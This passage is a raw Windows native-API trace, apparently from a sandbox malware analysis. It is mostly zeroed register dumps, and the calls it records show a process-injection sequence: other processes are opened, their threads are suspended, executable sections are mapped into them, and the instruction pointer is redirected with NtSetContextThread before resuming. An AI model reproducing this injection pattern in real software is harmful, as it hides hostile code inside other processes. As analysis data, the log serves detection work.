[471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.325] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0169.325] NtClose (Handle=0x138) returned 0x0 [0169.325] NtClose (Handle=0xb4) returned 0x0 [0169.326] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xfa4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0xb4) returned 0x0 [0169.326] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0169.326] NtQueryInformationProcess (in: ProcessHandle=0xb4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0169.326] NtReadVirtualMemory (in: ProcessHandle=0xb4, BaseAddress=0x28c000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0169.326] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0169.407] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xfa0) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0169.407] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0169.407] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0xb4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2190000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0169.541] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x28c000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.673] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0169.673] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x188200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x189000) returned 0x0 [0169.686] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x188200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2b60000, SectionOffset=0x0, ViewSize=0xde6e8*=0x189000) returned 0x0 [0169.745] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0169.759] NtClose (Handle=0x140) returned 0x0 [0169.759] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x28c000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2c55707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.882] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0169.911] NtClose (Handle=0xb4) returned 0x0 [0169.911] NtClose (Handle=0x138) returned 0x0 [0169.919] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xa14, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0169.919] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0169.919] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0169.919] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x26d000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0169.919] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0169.936] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xc2c) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0169.936] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0169.937] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x26d0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0169.958] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x26d000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, 